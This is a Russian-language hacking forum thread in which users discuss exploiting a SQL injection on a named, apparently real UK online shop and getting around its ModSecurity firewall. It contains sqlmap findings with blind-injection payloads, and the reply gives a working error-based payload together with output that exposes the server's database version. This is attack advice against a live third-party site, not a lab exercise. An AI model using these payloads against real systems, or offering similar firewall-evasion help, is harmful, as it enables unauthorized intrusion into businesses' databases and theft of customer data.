26.07.2018, 18:18
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от grelly
↑
Всем доброго времени суток, нашел SQLi, но при попытке раскрутки упираюсь в ваф Mod_security. Sqlmap при попытке атаки целевого url
http://shoebrand.co.uk/index.php?rou...th=64&limit=32
с использованием тампера between возвращает ошибку:
[WARNING] HTTP error codes detected during run:
403 (Forbidden) - 1 times.
Найденные уязвимости:
Parameter: path (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/category&path=64 AND 9469=9469&limit=32
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: route=product/category&path=64 AND SLEEP(10)&limit=32
Может кто-нибудь помочь советом, в какую сторону нужно копать для раскрутки вручную?
Код:
path=64 group by elt(rand(0)|0,version()) having avg(0)-- -
Duplicate entry '5.6.39-83.1' for key 'group_key
Почитайте больше про SQL инъекции, в особенности, про вывод в ошибке! А не про то как пользоваться sqlmap.
|
|
|